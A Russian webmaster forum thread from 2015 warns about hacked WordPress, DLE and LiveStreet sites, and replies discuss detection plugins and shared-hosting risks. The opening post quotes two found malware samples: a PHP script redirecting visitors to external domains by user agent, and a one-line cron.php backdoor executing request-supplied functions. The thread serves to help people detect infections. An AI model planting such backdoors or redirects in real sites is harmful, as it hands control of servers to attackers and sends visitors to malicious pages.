X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

> Очередная волна атак на сайты
OldSpice
OldSpice
Topic Starter сообщение 13.5.2015, 22:24; Ответить: OldSpice
Сообщение #1


Парни, хочу вас предупредить об активности ушлепков-какеров. Собственно советую проверить, не появились ли у вас на хостинге новые файлики с веселыми названиями secret.php, needle.php, earth.php, early.php, eight.php и тому подобные. Сделайте сортировку по дате и посмотрите последние созданные файлы.

Содержание у них либо закодированное в base64 либо вот такое:
Код
<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11A',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11A',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11A',            
);
$not_android_urls = array (
            'http://com-rj4.net/?a=314759&c=wl_con&s=11ALL',
            'http://com-gkz.net/?a=314759&c=wl_con&s=11ALL',    
            'http://com-8qq.net/?a=314759&c=wl_con&s=11ALL',    
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">


Также внимание на cron.php. Скорее всего ваш оригинальный был заменен на этот:
Код
<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>


Будьте аккуратней, парни!

Так же давайте обсудим как (кроме смены паролей к фтп) с этим шлаком бороться. От себя могу добавить, что неделей ранее я поймал браузерный вирус.
В корне лежит .ftpaccess, но он уже походу не помогает..

Сообщение отредактировал OldSpice - 13.5.2015, 22:24


Поблагодарили: (2)
4
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >  
Открыть тему
Ответов (1 - 9)
batueff888
batueff888
сообщение 13.5.2015, 22:46; Ответить: batueff888
Сообщение #2


OldSpice, у меня установлен плагин "WordPress File Monitor Plus", если есть какие-либо изменения в файлах, тут же сообщает мне на почту, причем конкретно указывает в каком файле какие изменения произошли.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 3:01; Ответить: Вентилятор
Сообщение #3


OldSpice, о какой cms речь?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
OldSpice
OldSpice
Topic Starter сообщение 14.5.2015, 10:43; Ответить: OldSpice
Сообщение #4


О всех :)
У меня попортили вордпресс, дле и лайвстрит.

Сообщение отредактировал OldSpice - 14.5.2015, 10:43
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
andrey10tic
andrey10tic
сообщение 14.5.2015, 10:55; Ответить: andrey10tic
Сообщение #5


Раньше я заметил такое на DLE. Походу некоторые "вундеркинды" взломав оставляют ссылки от своих сайтов.

Сообщение отредактировал andrey10tic - 14.5.2015, 10:56


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
phoenix_kys
phoenix_kys
сообщение 14.5.2015, 10:58; Ответить: phoenix_kys
Сообщение #6


OldSpice,

у вас дырка в каком-то одном сайте, через который закинуты эти вирусные файлы во все сайты на данном аккаунте
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 14.5.2015, 11:07; Ответить: x64
Сообщение #7


Цитата(phoenix_kys @ 14.5.2015, 9:58) *
у вас дырка в каком-то одном сайте

Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
webFlomaster
webFlomaster
сообщение 14.5.2015, 11:12; Ответить: webFlomaster
Сообщение #8


batueff888, простое но эффективное решение, пошел гуглить и ставить себе. А вы случайно не знаете такого же плана плагин только для Joomla?


--------------------
Семантическое ядро - качественно, со скидками делают здесь
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 14.5.2015, 13:42; Ответить: Вентилятор
Сообщение #9


OldSpice,
Цитата(OldSpice @ 14.5.2015, 9:43) *
О всех
У меня попортили вордпресс, дле и лайвстрит.

т.е. насколько понял ситуацию, конкретно у вас каким-то образом взломали сайты?

просто не понятно, с чего вы взяли, что это именно "волна атак", а не просто ваши недоработки по безопасности.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Зотов
Зотов
сообщение 14.5.2015, 13:54; Ответить: Зотов
Сообщение #10


Цитата(x64 @ 14.5.2015, 11:07) *
Встречал такую ситуацию, что со своих сайтов можно было кошмарить соседей по серверу.


На reg.ru такая дырища была. Я им говорил про это - они отвечают, что это ваши половые трудности, разгребайтесь сами.

Посмотрел свои сайты, вроде всё чисто.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСайты уходят в прошлое
для развития бизнеса стали не столь актуальны
154 muratastana 30532 16.4.2024, 22:40
автор: malamut
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам свои сайты
10 сайтов на продажу
3 ArchiDOM 1449 5.4.2024, 3:51
автор: Llirik
Открытая тема (нет новых ответов) Есть смысл создавать сайты на латышском?
16 Nekit 3941 31.3.2024, 1:23
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСайты с доходом на продажу. Будет ли спрос?
46 Telnor 45041 30.3.2024, 15:37
автор: trustedadvisor
Открытая тема (нет новых ответов) Куплю хорошие сайты
7 Boymaster 2431 25.3.2024, 12:50
автор: Wilkinson


 



RSS Текстовая версия Сейчас: 20.4.2024, 1:26
Дизайн